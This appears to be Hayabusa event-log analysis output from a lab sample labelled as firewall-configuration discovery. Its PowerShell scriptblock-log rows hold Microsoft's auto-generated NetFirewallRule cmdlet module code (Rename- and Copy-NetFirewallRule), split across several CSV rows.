[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_met",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"hodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetFirewallRule' function Copy-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdle",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"t.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and 